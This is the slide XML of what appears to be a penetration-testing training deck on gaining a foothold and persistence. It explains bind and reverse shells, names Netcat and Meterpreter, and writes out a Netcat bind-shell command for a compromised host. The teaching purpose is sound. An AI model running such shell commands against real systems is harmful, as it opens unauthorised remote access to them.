              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Performing system manipulation using management protocols (for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, WMI, SMB, SNMP) and compromised credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Executing additional exploits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>You can also take several actions through the compromised system, including the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Configuring port forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Creating SSH tunnels or proxies to communicate to the internal network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Using a VPN to access the internal network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2428637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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="9026972"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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is a utility (software) that acts as an interface between a user and the OS (the kernel and its services). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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In Linux there are several shell environments, such as Bash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ksh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>tcsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Traditionally, in Windows the shell is the command prompt (CLI), which is invoked by cmd.exe. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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Windows PowerShell is a newer Microsoft shell that combines the old CMD functionality with a new scripting/cmdlet instruction set with built-in system administration functionality.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PowerShell cmdlets allow users and administrators to automate complicated tasks with reusable scripts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4725628E-BBE1-B8E2-1A3B-DE00A7BDEBC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2823" y="2677013"/>
            <a:ext cx="4567892"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Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>With a bind shell, an attacker opens a port or a listener on the compromised system and waits for a connection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>This is done to connect to the victim from any system and execute commands and further manipulate the victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The figure illustrates a bind shell.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagem 7" descr="Interface gráfica do usuário, Texto, Aplicativo&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6F6EE8C-AABF-049A-1000-B0FC671EEAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4699239" y="2743538"/>
            <a:ext cx="4263605" cy="1209181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35812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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE79AAD0-1CE8-5B1D-C43C-0A1A6DC5E0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2221" y="957785"/>
            <a:ext cx="896227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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A reverse shell is a vulnerability in which an attacking system has a listener (port open), and the victim initiates a connection back to the attacking system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CaixaDeTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CE843E3-84AC-086E-EC19-6322B55A4492}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1578428"/>
            <a:ext cx="374196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cs typeface="Arial"/>
              </a:rPr>
              <a:t>The figure illustrates a reverse shell.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 7" descr="Interface gráfica do usuário, Texto, Aplicativo, Email&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27EA2DEC-C336-AA53-B8FC-193B750D6726}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4041476" y="1554079"/>
            <a:ext cx="4446916" cy="1097220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="333333">
                <a:alpha val="65000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CaixaDeTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46BA5A6-6D4D-4DF0-C6FE-F04BF8F0AED0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2901659"/>
            <a:ext cx="522540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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Many tools allow you to create bind and reverse shells from a compromised host. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Some of them are the Meterpreter module in Metasploit and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is one of the best and most versatile tools for pen testers because it is lightweight and very portable.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The figure illustrates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> man page (output omitted for brevity).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagem 9" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE933B05-BD95-D833-2BCC-6BE2AA2E704F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551098" y="3144519"/>
            <a:ext cx="3228435" cy="1269859"/>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2092211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10783" y="0"/>
            <a:ext cx="9144000" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creating a Foothold and Maintaining Persistence After Compromising a System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reverse and Bind Shells (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CaixaDeTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46FF45F9-A025-60E4-6F2A-635F26BEAE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-15918" y="957635"/>
            <a:ext cx="892833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1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>An attacker could use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 1234 -e /bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> command in the compromised system (192.168.78.6) to create a listener on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>1234 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and execute (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>) the Bash shell (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/bin/bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
